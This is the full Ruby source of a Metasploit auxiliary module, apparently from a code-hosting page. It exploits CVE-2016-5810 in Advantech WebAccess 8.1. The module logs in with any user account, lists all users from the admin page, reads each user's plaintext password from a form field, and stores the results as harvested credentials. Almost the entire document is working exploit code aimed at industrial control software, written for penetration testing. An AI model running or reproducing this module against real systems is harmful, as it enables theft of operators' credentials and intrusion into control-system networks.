Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info={})
10
    super(update_info(info,
11
      'Name'           => "Advantech WebAccess 8.1 Post Authentication Credential Collector",
12
      'Description'    => %q{
13
        This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.
14
        Although authentication is required, any level of user permission can exploit this vulnerability.
15

16
        Note that 8.2 is not suitable for this.
17
      },
18
      'License'        => MSF_LICENSE,
19
      'Author'         =>
20
        [
21
          'h00die', # Pointed out the obvious during a PR review for CVE-2017-5154
22
          'sinn3r', # Metasploit module
23
        ],
24
      'References'     =>
25
        [
26
          ['CVE', '2016-5810'],
27
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']
28
        ],
29
      'DisclosureDate' => '2017-01-21'
30
    ))
31

32
    register_options(
33
      [
34
        OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),
35
        OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),
36
        OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),
37
      ])
38
  end
39

40
  def do_login
41
    vprint_status("Attempting to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")
42

43
    uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')
44

45
    res = send_request_cgi({
46
      'method'    => 'POST',
47
      'uri'       => uri,
48
      'vars_post' => {
49
        'page' => '/',
50
        'pos'  => '',
51
        'username' => datastore['WEBACCESSUSER'],
52
        'password' => datastore['WEBACCESSPASS'],
53
        'remMe'    => '',
54
        'submit1'  => 'Login'
55
      }
56
    })
57

58
    unless res
59
      fail_with(Failure::Unknown, 'Connection timed out while trying to login')
60
    end
61

62
    if res.headers['Location'] && res.headers['Location'] == '/broadweb/bwproj.asp'
63
      print_good("Logged in as #{datastore['WEBACCESSUSER']}")
64
      report_cred(
65
        user: datastore['WEBACCESSUSER'],
66
        password: datastore['WEBACCESSPASS'],
67
        status: Metasploit::Model::Login::Status::SUCCESSFUL
68
      )
69
      return res.get_cookies.scan(/(ASPSESSIONID\w+=\w+);/).flatten.first || ''
70
    end
71

72
    print_error("Unable to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")
73

74
    nil
75
  end
76

77
  def get_user_cred_detail(sid, user)
78
    vprint_status("Gathering password for user: #{user}")
79

80
    uri = normalize_uri(target_uri.path, 'broadWeb','user', 'upAdminPg.asp')
81

82
    res = send_request_cgi({
83
      'method' => 'GET',
84
      'uri'    => uri,
85
      'cookie' => sid,
86
      'vars_get' => {
87
        'uname' => user
88
      }
89
    })
90

91
    unless res
92
      print_error("Unable to gather password for user #{user} due to a connection timeout")
93
      return nil
94
    end
95

96
    html = res.get_html_document
97
    pass_field = html.at('input[@name="Password"]')
98

99
    pass_field ? pass_field.attributes['value'].text : nil
100
  end
101

102
  def get_users_page(sid)
103
    vprint_status("Checking user page...")
104

105
    uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'AdminPg.asp')
106

107
    res = send_request_cgi({
108
      'method' => 'GET',
109
      'uri'    => uri,
110
      'cookie' => sid
111
    })
112

113
    unless res
114
      fail_with(Failure::Unknown, 'Connection timed out while checking AdminPg.asp')
115
    end
116

117
    html = res.get_html_document
118

119
    users = html.search('a').map { |a|
120
      Rex::Text.uri_decode(a.attributes['href'].text.scan(/broadWeb\/user\/upAdminPg\.asp\?uname=(.+)/).flatten.first || '')
121
    }.delete_if { |user| user.blank? }
122

123
    users
124
  end
125

126
  def report_cred(opts)
127
    service_data = {
128
      address: rhost,
129
      port: rport,
130
      service_name: 'webaccess',
131
      protocol: 'tcp',
132
      workspace_id: myworkspace_id
133
    }
134

135
    credential_data = {
136
      origin_type: :service,
137
      module_fullname: fullname,
138
      username: opts[:user],
139
      private_data: opts[:password],
140
      private_type: :password
141
    }.merge(service_data)
142

143
    login_data = {
144
      last_attempted_at: DateTime.now,
145
      core: create_credential(credential_data),
146
      status: opts[:status],
147
      proof: opts[:proof]
148
    }.merge(service_data)
149

150
    create_credential_login(login_data)
151
  end
152

153
  def run
154
    cookie = do_login
155
    users = get_users_page(cookie)
156

157
    users.each do |user|
158
      pass = get_user_cred_detail(cookie, user)
159

160
      if pass
161
        report_cred(
162
          user: user,
163
          password: pass,
164
          status: Metasploit::Model::Login::Status::SUCCESSFUL,
165
          proof: 'AdminPg.asp'
166
        )
167

168
        print_good("Found password: #{user}:#{pass}")
169
      end
170
    end
171
  end
172
end
173

174